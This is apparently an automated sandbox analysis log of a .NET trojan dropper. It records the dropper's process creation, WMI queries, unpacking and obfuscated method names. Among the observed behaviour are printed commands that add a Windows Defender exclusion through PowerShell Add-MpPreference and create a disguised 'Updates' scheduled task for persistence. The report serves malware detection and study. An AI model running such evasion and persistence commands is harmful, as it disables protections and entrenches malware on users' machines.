                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: tXBTtgndxsp.exe, 00000014.00000002.3693836646.0000000000F03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: select * from Win32_OperatingSystem);
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeReversingLabs: Detection: 15%
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeVirustotal: Detection: 31%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpD46C.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpE610.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess created: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpD46C.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpE610.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess created: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, --.cs.Net Code: _0005
                    Source: tXBTtgndxsp.exe.0.dr, --.cs.Net Code: _0005
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.5040000.9.raw.unpack, nL.cs.Net Code: sf
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.5040000.9.raw.unpack, nL.cs.Net Code: wb System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, IuVXaGDxQlRyhibAhc.cs.Net Code: m21SmSSGax System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, IuVXaGDxQlRyhibAhc.cs.Net Code: m21SmSSGax System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_06A535FE push ss; retf 0_2_06A53607
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_06A51AD2 push FFFFFFADh; retf 0_2_06A51AD4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_06A52B93 pushfd ; retf 0_2_06A52B94
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_06A52BE4 pushfd ; retf 0_2_06A52BE6
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_06A501EA push EB900502h; ret 0_2_06A501F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_01330CB5 push edi; ret 7_2_01330CC2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_01330C95 push edi; retf 7_2_01330C3A
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_067435FE push ss; retf 8_2_06743607
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_067401EA push EB9004CDh; ret 8_2_067401F0
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_01010C95 push edi; retf 20_2_01010C3A
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_01010CB5 push edi; ret 20_2_01010CC2
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeStatic PE information: section name: .text entropy: 7.963501773145212
                    Source: tXBTtgndxsp.exe.0.drStatic PE information: section name: .text entropy: 7.963501773145212
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, Um4yaVbyyy2ONJ8Cca.csHigh entropy of concatenated method names: 'EYYmETedNK5u7MPjPh6', 'jRTGyteq0BuFLy5QQLr', 'Ha6QbgeUmwltsnHlvRJ', 'zrunyiiNFx', 'gUvnFHFoDj', 'IP8nx9InsV', 'xhv4dUeHy2BIpqEthM7', 'iBRkpte8FppfTn8b2JP', 'FsfxwseXNxrEU1vocKB'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, zvZ1wRqArYMQLltk6F.csHigh entropy of concatenated method names: 'xelmvVGqe', 'vMsZtGShh', 'dP3ANmXN2', 'qMXMvGjHu', 'hrSIAMenf', 'o80EAbZlT', 'bo3yUBK68ePfdi5DL0', 'NcTx4FZe3BWOaXiSCs', 'tuUyopn7Z', 'AgixqacPj'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, Shy7RVEZ64isDMi7Zb.csHigh entropy of concatenated method names: 'bTlylXPxj7', 'BXpyP5R9ms', 'SNTywpuSHW', 'GEWyY9G7hN', 'xgMynK8yJb', 'Gogyhwp9OF', 'VhlydnCa1U', 'Um7yuSvoTf', 'nKCyoiVOw2', 'OqJybXrZP9'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, zti8Z3aDWspbPOBxw6.csHigh entropy of concatenated method names: 'Dispose', 'DROXGIJRHS', 'g9SCKYEgcb', 'Joniivhava', 'L1KXHUf7uF', 'pC8XzTBTXe', 'ProcessDialogKey', 's1lCQwhZSP', 'm7aCXIoxPi', 'Of8CCGttH1'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, lQlBMh1K3TqpxdIR11.csHigh entropy of concatenated method names: 'pawYjKZ7Pi', 'U0KYMfO1OQ', 'Oniwa67f7e', 'SOdw4Wx8iM', 'VVbwWxkMq3', 'yrpwvZVOrh', 'lQqwJJMn0b', 'YREw0Jq7eg', 'wakw2WDmo1', 'IyiwfmDHPf'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, ADu39ylQ4Mr8G0IJb4.csHigh entropy of concatenated method names: 'EZaBoI07A2', 'zHWBbb4JOM', 'ToString', 'xpjBliio2g', 'pGLBPpkwCc', 'ohmBw7hEXn', 'kPtBYipcV3', 'SDpBno974X', 'HrtBh4w8uD', 'm5EBdvAN8E'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, IuVXaGDxQlRyhibAhc.csHigh entropy of concatenated method names: 'XLE7tX9psi', 'G2u7lt2tdL', 'lom7PFiACq', 'E6v7wPyTmf', 'Edt7YEjZUQ', 'wT37nZrdc0', 'A817hR82kA', 'IRd7dr73mL', 'lYK7ujEoVB', 'ckA7oMpZGq'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, EndPLZ7Ti1Dvmhs2BrC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SJWxknm6Fx', 'vtux1X7gF5', 'Xe4xeIMUIA', 'SU2xTcu8dX', 'U9dxOYK3tX', 'Gv9xg2sLhb', 'd8pxqyJkkK'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, t2pZ085yZqtyXfNEDc.csHigh entropy of concatenated method names: 'e6MntDDdem', 'yMInPrJVOK', 'tmhnYTHjXN', 'CYSnhOy3LK', 'B37ndbwZYN', 'BNgYOqKgKs', 'yBfYg1Yujm', 'vIhYqFg5qI', 'UEOY9J0Mwu', 'TgxYGWXXdF'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, CMvOCJninX3Ge6muAq.csHigh entropy of concatenated method names: 'K89FXMJuP8', 'GU4F7ZLj4n', 'gQGFSSESLB', 'VcmFl2wO8y', 'qWkFPKcbJ9', 'C6jFY2RcCn', 'vYEFnVnUIy', 'PP1yqb3nO2', 'e0My9l17yI', 'lmYyGV6hJF'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, NSAwsMS5RhwN1HS891.csHigh entropy of concatenated method names: 'nafc6ijc4l', 'pJKcITSVWQ', 'OWTcVCAY0I', 'iZBcKUUrGS', 'Tq1c46crLO', 'mO4cWFAluL', 'Cr9cJrUckH', 'l5gc0UY9oc', 'dhAcfFNSIt', 'bGpcUhYehY'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, vM27roAJWyo67lq3Gv.csHigh entropy of concatenated method names: 'SZOPk6LU42', 'dZKP1Dt37S', 'eb1PewDTtg', 'InnPTFGHpi', 'Be6PO7NdYX', 'fiIPgbgq0W', 'd6XPqBKAnd', 'oXGP9mLjgw', 'dHMPGKWmyJ', 'MWFPHyQWb9'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, J9ioHGgIu3ItcGvcrs.csHigh entropy of concatenated method names: 'PsDXhrsJj8', 'tYXXdaVocV', 'TZhXoC2jCg', 'CJJXbwrGn7', 'COTXsYVJKS', 'ftAX5Gg4Fr', 'SIywSMlxvJyKT2orQv', 'JShBdtNvJlYTXAlBdD', 'VfNXX8HcaD', 'GJVX74IhOW'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, XvjMZrNOUXw3yYaGZV.csHigh entropy of concatenated method names: 'oj0hlDouE3', 'GC6hwEVh99', 'dIkhnwX60U', 'p3WnHmLTbi', 'yoAnzL2CYN', 'gXFhQA5nji', 'XFEhX6N1FH', 'laXhCgasYY', 'FFNh7clB9R', 'SfjhSCjvlq'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, lL1cZUxesa1Tw0uLat.csHigh entropy of concatenated method names: 'oLrwZmn0iW', 'SmtwAPSkjD', 'yO0w6NER6P', 'aGNwIY6Uoo', 'rdWws8Tn74', 'w5Tw5KKDPI', 'ndxwBu1aLW', 'N6qwyAisUe', 'vN9wFAQgoA', 'CohwxSH8Mj'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, ucjHfk79IPepqgpRcTQ.csHigh entropy of concatenated method names: 'V8uFLm042L', 'pJlFR0AQHq', 'Jb4FmWNoe8', 'cNtFZnWRsj', 'GkOFjFT8fc', 'SgYFAuwIfh', 'pPCFMxmAbZ', 'nUCF6CJsBa', 'QqQFILMLWI', 'RthFEpBDSl'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, jpP0MPQKGnWLR9ELRl.csHigh entropy of concatenated method names: 'Ba0B9EYWxs', 'LnlBHfIqr5', 'pWoyQoTuX4', 'kt7yXwPMUy', 'aSpBURVU8x', 'c7ZB8AhIiX', 'C47BNEww6x', 'knvBkoD3JQ', 'O61B1jX1xs', 'q4QBeWTQyY'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, GC2uDedh9rNcspPw30.csHigh entropy of concatenated method names: 'PcZhL7HOi1', 'D9JhRI1cfK', 'JJIhmF8rqy', 'K30hZ1O0QC', 'tp3hjqy3uE', 'EmShAJKOo3', 'y6VhMEJPkd', 'mCoh6S00KI', 'BKChIDeUBq', 'en5hEbaTUC'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, Um4yaVbyyy2ONJ8Cca.csHigh entropy of concatenated method names: 'EYYmETedNK5u7MPjPh6', 'jRTGyteq0BuFLy5QQLr', 'Ha6QbgeUmwltsnHlvRJ', 'zrunyiiNFx', 'gUvnFHFoDj', 'IP8nx9InsV', 'xhv4dUeHy2BIpqEthM7', 'iBRkpte8FppfTn8b2JP', 'FsfxwseXNxrEU1vocKB'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, zvZ1wRqArYMQLltk6F.csHigh entropy of concatenated method names: 'xelmvVGqe', 'vMsZtGShh', 'dP3ANmXN2', 'qMXMvGjHu', 'hrSIAMenf', 'o80EAbZlT', 'bo3yUBK68ePfdi5DL0', 'NcTx4FZe3BWOaXiSCs', 'tuUyopn7Z', 'AgixqacPj'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, Shy7RVEZ64isDMi7Zb.csHigh entropy of concatenated method names: 'bTlylXPxj7', 'BXpyP5R9ms', 'SNTywpuSHW', 'GEWyY9G7hN', 'xgMynK8yJb', 'Gogyhwp9OF', 'VhlydnCa1U', 'Um7yuSvoTf', 'nKCyoiVOw2', 'OqJybXrZP9'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, zti8Z3aDWspbPOBxw6.csHigh entropy of concatenated method names: 'Dispose', 'DROXGIJRHS', 'g9SCKYEgcb', 'Joniivhava', 'L1KXHUf7uF', 'pC8XzTBTXe', 'ProcessDialogKey', 's1lCQwhZSP', 'm7aCXIoxPi', 'Of8CCGttH1'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, lQlBMh1K3TqpxdIR11.csHigh entropy of concatenated method names: 'pawYjKZ7Pi', 'U0KYMfO1OQ', 'Oniwa67f7e', 'SOdw4Wx8iM', 'VVbwWxkMq3', 'yrpwvZVOrh', 'lQqwJJMn0b', 'YREw0Jq7eg', 'wakw2WDmo1', 'IyiwfmDHPf'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, ADu39ylQ4Mr8G0IJb4.csHigh entropy of concatenated method names: 'EZaBoI07A2', 'zHWBbb4JOM', 'ToString', 'xpjBliio2g', 'pGLBPpkwCc', 'ohmBw7hEXn', 'kPtBYipcV3', 'SDpBno974X', 'HrtBh4w8uD', 'm5EBdvAN8E'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, IuVXaGDxQlRyhibAhc.csHigh entropy of concatenated method names: 'XLE7tX9psi', 'G2u7lt2tdL', 'lom7PFiACq', 'E6v7wPyTmf', 'Edt7YEjZUQ', 'wT37nZrdc0', 'A817hR82kA', 'IRd7dr73mL', 'lYK7ujEoVB', 'ckA7oMpZGq'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, EndPLZ7Ti1Dvmhs2BrC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SJWxknm6Fx', 'vtux1X7gF5', 'Xe4xeIMUIA', 'SU2xTcu8dX', 'U9dxOYK3tX', 'Gv9xg2sLhb', 'd8pxqyJkkK'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, t2pZ085yZqtyXfNEDc.csHigh entropy of concatenated method names: 'e6MntDDdem', 'yMInPrJVOK', 'tmhnYTHjXN', 'CYSnhOy3LK', 'B37ndbwZYN', 'BNgYOqKgKs', 'yBfYg1Yujm', 'vIhYqFg5qI', 'UEOY9J0Mwu', 'TgxYGWXXdF'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, CMvOCJninX3Ge6muAq.csHigh entropy of concatenated method names: 'K89FXMJuP8', 'GU4F7ZLj4n', 'gQGFSSESLB', 'VcmFl2wO8y', 'qWkFPKcbJ9', 'C6jFY2RcCn', 'vYEFnVnUIy', 'PP1yqb3nO2', 'e0My9l17yI', 'lmYyGV6hJF'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, NSAwsMS5RhwN1HS891.csHigh entropy of concatenated method names: 'nafc6ijc4l', 'pJKcITSVWQ', 'OWTcVCAY0I', 'iZBcKUUrGS', 'Tq1c46crLO', 'mO4cWFAluL', 'Cr9cJrUckH', 'l5gc0UY9oc', 'dhAcfFNSIt', 'bGpcUhYehY'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, vM27roAJWyo67lq3Gv.csHigh entropy of concatenated method names: 'SZOPk6LU42', 'dZKP1Dt37S', 'eb1PewDTtg', 'InnPTFGHpi', 'Be6PO7NdYX', 'fiIPgbgq0W', 'd6XPqBKAnd', 'oXGP9mLjgw', 'dHMPGKWmyJ', 'MWFPHyQWb9'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, J9ioHGgIu3ItcGvcrs.csHigh entropy of concatenated method names: 'PsDXhrsJj8', 'tYXXdaVocV', 'TZhXoC2jCg', 'CJJXbwrGn7', 'COTXsYVJKS', 'ftAX5Gg4Fr', 'SIywSMlxvJyKT2orQv', 'JShBdtNvJlYTXAlBdD', 'VfNXX8HcaD', 'GJVX74IhOW'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, XvjMZrNOUXw3yYaGZV.csHigh entropy of concatenated method names: 'oj0hlDouE3', 'GC6hwEVh99', 'dIkhnwX60U', 'p3WnHmLTbi', 'yoAnzL2CYN', 'gXFhQA5nji', 'XFEhX6N1FH', 'laXhCgasYY', 'FFNh7clB9R', 'SfjhSCjvlq'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, lL1cZUxesa1Tw0uLat.csHigh entropy of concatenated method names: 'oLrwZmn0iW', 'SmtwAPSkjD', 'yO0w6NER6P', 'aGNwIY6Uoo', 'rdWws8Tn74', 'w5Tw5KKDPI', 'ndxwBu1aLW', 'N6qwyAisUe', 'vN9wFAQgoA', 'CohwxSH8Mj'
